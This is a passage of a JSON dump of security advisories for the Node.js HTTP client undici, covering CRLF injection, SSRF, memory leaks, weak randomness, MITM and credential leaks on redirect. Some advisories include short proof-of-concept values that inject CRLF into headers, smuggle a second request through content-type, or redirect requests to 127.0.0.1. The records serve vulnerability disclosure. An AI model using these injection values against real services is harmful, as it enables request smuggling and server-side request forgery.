"https://github.com/nodejs/undici/releases/tag/v6.6.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240419-0007" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2024-02-16T16:02:52Z", "nvd_published_at": "2024-02-16T22:15:08Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3cvr-822r-rqcc", "published": "2022-07-21T20:30:10Z", "modified": "2023-11-08T04:09:27.728154Z", "aliases": [ "CVE-2022-31150" ], "summary": "undici before v5.8.0 vulnerable to CRLF injection in request headers", "details": "### Impact\n\nIt is possible to inject CRLF sequences into request headers in Undici.\n\n```js\nconst undici = require('undici')\n\nconst response = undici.request(\"http://127.0.0.1:1000\", {\n headers: {'a': \"\\r\\nb\"}\n})\n```\n\nThe same applies to `path` and `method`\n\n### Patches\n\nUpdate to v5.8.0\n\n### Workarounds\n\nSanitize all HTTP headers from untrusted sources to eliminate `\\r\\n`.\n\n### References\n\nhttps://hackerone.com/reports/409943\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12116\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-3cvr-822r-rqcc/GHSA-3cvr-822r-rqcc.json" } } ], "references": [ { "type": "WEB", "url": 
"https://github.com/nodejs/undici/security/advisories/GHSA-3cvr-822r-rqcc" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31150" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/a29a151d0140d095742d21a004023d024fe93259" }, { "type": "WEB", "url": "https://hackerone.com/reports/409943" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220915-0002" } ], "database_specific": { "cwe_ids": [ "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T20:30:10Z", "nvd_published_at": "2022-07-19T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3g92-w8c5-73pq", "published": "2024-07-09T13:32:30Z", "modified": "2024-07-09T13:57:47.271493Z", "aliases": [ "CVE-2024-38372" ], "related": [ "CVE-2024-38372" ], "summary": "Undici vulnerable to data leak when using response.arrayBuffer()", "details": "### Impact\n\nDepending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include a portion of memory from the Node.js process.\n\n### Patches\n\nThis has been patched in v6.19.2.\n\n### Workarounds\n\nThere are no known workarounds.\n\n### References\n\nhttps://github.com/nodejs/undici/issues/3337\nhttps://github.com/nodejs/undici/issues/3328\nhttps://github.com/nodejs/undici/pull/3338\nhttps://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.14.0" }, { "fixed": "6.19.2" } ] } ], "database_specific": { "source":
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-3g92-w8c5-73pq/GHSA-3g92-w8c5-73pq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3g92-w8c5-73pq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38372" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3328" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3337" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/3338" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2024-07-09T13:32:30Z", "nvd_published_at": "2024-07-08T21:15:12Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5r9g-qh6m-jxff", "published": "2023-02-16T20:46:30Z", "modified": "2024-12-16T15:26:50.318903Z", "aliases": [ "BIT-node-2023-23936", "BIT-node-min-2023-23936", "CVE-2023-23936" ], "related": [ "CVE-2023-23936" ], "summary": "CRLF Injection in Nodejs ‘undici’ via host", "details": "### Impact\n\nundici library does not protect `host` HTTP header from CRLF injection vulnerabilities.\n\n### Patches\n\nThis issue was patched in Undici v5.19.1.\n\n### Workarounds\n\nSanitize the `headers.host` string before passing to undici.\n\n### References\n\nReported at https://hackerone.com/reports/1820955.\n\n### Credits\n\nThank you to Zhipeng Zhang ([@timon8](https://hackerone.com/timon8)) for reporting this vulnerability. 
", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "5.19.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-5r9g-qh6m-jxff/GHSA-5r9g-qh6m-jxff.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-5r9g-qh6m-jxff" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23936" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/a2eff05401358f6595138df963837c24348f2034" }, { "type": "WEB", "url": "https://hackerone.com/reports/1820955" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.19.1" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2023-02-16T20:46:30Z", "nvd_published_at": "2023-02-16T18:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8qr4-xgw6-wmr3", "published": "2022-08-18T18:59:46Z", "modified": "2023-11-08T04:09:53.898548Z", "aliases": [ "CVE-2022-35949" ], "summary": "`undici.request` vulnerable to SSRF using absolute URL on `pathname`", "details": "### Impact\n\n`undici` is vulnerable to SSRF (Server-side Request Forgery) when an application takes in **user input** into the `path/pathname` option of `undici.request`.\n\nIf a user specifies a URL such as `http://127.0.0.1` or `//127.0.0.1`\n\n```js\nconst undici = require(\"undici\")\nundici.request({origin: \"http://example.com\", pathname: \"//127.0.0.1\"})\n```\n\nInstead of processing the request as `http://example.org//127.0.0.1` (or `http://example.org/http://127.0.0.1` when `http://127.0.0.1` is used), it actually
processes the request as `http://127.0.0.1/` and sends it to `http://127.0.0.1`.\n\nIf a developer passes in user input into `path` parameter of `undici.request`, it can result in an _SSRF_ as they will assume that the hostname cannot change, when in actual fact it can change because the specified path parameter is combined with the base URL.\n\n### Patches\n\nThis issue was fixed in `undici@5.8.1`.\n\n### Workarounds\n\nThe best workaround is to validate user input before passing it to the `undici.request` call.\n\n## For more information\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n- To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.8.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8qr4-xgw6-wmr3/GHSA-8qr4-xgw6-wmr3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-8qr4-xgw6-wmr3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35949" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/124f7ebf705366b2e1844dff721928d270f87895" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.2" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "github_reviewed_at": "2022-08-18T18:59:46Z", "nvd_published_at": "2022-08-12T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", 
"id": "GHSA-9f24-jqhm-jfcw", "published": "2024-02-16T15:59:38Z", "modified": "2024-04-19T09:30:47Z", "aliases": [ "CVE-2024-24750" ], "related": [ "CVE-2024-24750" ], "summary": "fetch(url) leads to a memory leak in undici", "details": "### Impact\n\nCalling `fetch(url)` and not consuming the incoming body (or consuming it very slowly) will lead to a memory leak. \n\n### Patches\n\nPatched in v6.6.1\n\n### Workarounds\n\nMake sure to always consume the incoming body.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-9f24-jqhm-jfcw/GHSA-9f24-jqhm-jfcw.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24750" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v6.6.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240419-0006" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-401" ], "github_reviewed": true, "github_reviewed_at": "2024-02-16T15:59:38Z", "nvd_published_at": "2024-02-16T22:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9qxr-qj54-h672", "published": "2024-04-04T14:20:54Z", "modified": "2025-11-04T19:44:42Z", "aliases": [ "CVE-2024-30261" ], "summary": "Undici's fetch with integrity option is too lax when algorithm is specified
but hash value is incorrect", "details": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered with.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes have been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-9qxr-qj54-h672/GHSA-9qxr-qj54-h672.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.11.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-9qxr-qj54-h672/GHSA-9qxr-qj54-h672.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30261" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3" }, { "type": "WEB", "url": "https://hackerone.com/reports/2377760" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240905-0008" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2024-04-04T14:20:54Z", "nvd_published_at": "2024-04-04T15:15:39Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c76h-2ccp-4975", "published": "2025-01-21T21:10:47Z", "modified": "2025-01-21T21:27:05.225594Z", "aliases": [ "CVE-2025-22150" ], "summary": "Use of Insufficiently Random Values in undici", "details": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. 
Therefore, an attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker-controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.5.0" }, { "fixed": "5.28.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.21.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22150" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a" }, { "type": "WEB", "url": 
"https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385" }, { "type": "WEB", "url": "https://hackerone.com/reports/2913312" }, { "type": "WEB", "url": "https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], "github_reviewed": true, "github_reviewed_at": "2025-01-21T21:10:47Z", "nvd_published_at": "2025-01-21T18:15:14Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cxrh-j4jr-qwg3", "published": "2025-05-15T14:15:06Z", "modified": "2025-05-16T02:07:00Z", "aliases": [ "CVE-2025-47279" ], "related": [ "CGA-gf48-w429-582m" ], "summary": "undici Denial of Service attack via bad certificate data", "details": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. 
\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.29.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.21.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47279" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3895" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/4088" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-401" ], "github_reviewed": true, "github_reviewed_at": "2025-05-15T14:15:06Z", "nvd_published_at": "2025-05-15T18:15:38Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f772-66g8-q5h3", "published": "2022-08-18T19:02:56Z", "modified": "2023-11-08T04:09:53.836338Z", "aliases": [ "CVE-2022-35948" ], "summary": "Nodejs ‘undici’ vulnerable to CRLF Injection via Content-Type", "details": "### Impact\n\n`=\u003c undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header.\n\nExample:\n\n```\nimport { request } from 'undici'\n\nconst unsanitizedContentTypeInput = 'application/json\\r\\n\\r\\nGET /foo2 HTTP/1.1'\n\nawait request('http://localhost:3000, {\n method: 'GET',\n headers: {\n 'content-type': unsanitizedContentTypeInput\n },\n})\n```\n\nThe above snippet will perform two requests in a single `request` API call:\n\n1) `http://localhost:3000/`\n2) `http://localhost:3000/foo2`\n\n### Patches\n\nThis issue was patched in Undici v5.8.1\n\n### Workarounds\n\nSanitize input when sending content-type headers using user input.\n\n## For more information\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n- To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.8.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-f772-66g8-q5h3/GHSA-f772-66g8-q5h3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f772-66g8-q5h3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35948" }, { "type": "WEB", "url": 
"https://github.com/nodejs/undici/commit/66165d604fd0aee70a93ed5c44ad4cc2df395f80" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.2" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-08-18T19:02:56Z", "nvd_published_at": "2022-08-15T11:21:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m4v8-wqvr-p9f7", "published": "2024-04-04T14:20:39Z", "modified": "2025-11-04T19:44:28Z", "aliases": [ "CVE-2024-30260" ], "summary": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline", "details": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-m4v8-wqvr-p9f7/GHSA-m4v8-wqvr-p9f7.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.11.1" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-m4v8-wqvr-p9f7/GHSA-m4v8-wqvr-p9f7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30260" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75" }, { "type": "WEB", "url": "https://hackerone.com/reports/2408074" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240905-0008" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-285", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2024-04-04T14:20:39Z", "nvd_published_at": "2024-04-04T16:15:08Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pgw7-wx7w-2w33", "published": "2022-06-17T01:02:29Z", "modified": "2023-11-08T04:09:35.326222Z", "aliases": [ "CVE-2022-32210" ], "related": [ "CVE-2022-32210" ], "summary": "ProxyAgent vulnerable to MITM", "details": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request \u0026 response data to the proxy. 
This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.8.2" }, { "fixed": "5.5.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-pgw7-wx7w-2w33/GHSA-pgw7-wx7w-2w33.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32210" }, { "type": "WEB", "url": "https://hackerone.com/reports/1583680" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2022-06-17T01:02:29Z", "nvd_published_at": "2022-07-14T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q768-x9m6-m9qp", "published": "2022-07-21T20:31:05Z", "modified": "2024-12-05T15:41:55.533076Z", "aliases": [ "CVE-2022-31151" ], "related": [ "CVE-2023-45143" ], "summary": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect", "details": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). 
